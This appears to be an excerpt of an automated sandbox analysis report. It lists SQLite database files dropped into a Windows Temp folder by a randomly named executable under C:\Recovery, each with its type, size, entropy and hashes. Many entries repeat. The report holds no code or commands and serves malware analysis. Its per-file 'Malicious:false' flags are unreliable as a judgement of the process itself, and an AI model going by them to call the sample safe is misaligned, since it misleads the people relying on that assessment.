                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MD77yfAj0S

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MMIhm3GZns

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MV09GZzAnd

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\Mf2RrVRWGt

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\Mms2F5H8gz

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MyoMf6gJKG

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\N7obUy7tU3

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\NCYC54HwKp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\NGtVmVqDYM

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\NQdhKOaonm

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\OaSrIWRp1K

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\OoSBvZ9i6Z

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\Oz4ujQCewf

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\PGRCH9cfsR

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\PnrVm0lZkg

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\QCVhfm1mYC

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\QPMYs41KAP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\QaBN9j7cqU

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\QaeS8hs2eG

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\QqhZYXE39u

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\RWJY1WDH4X

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\RxCDbJxl53

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
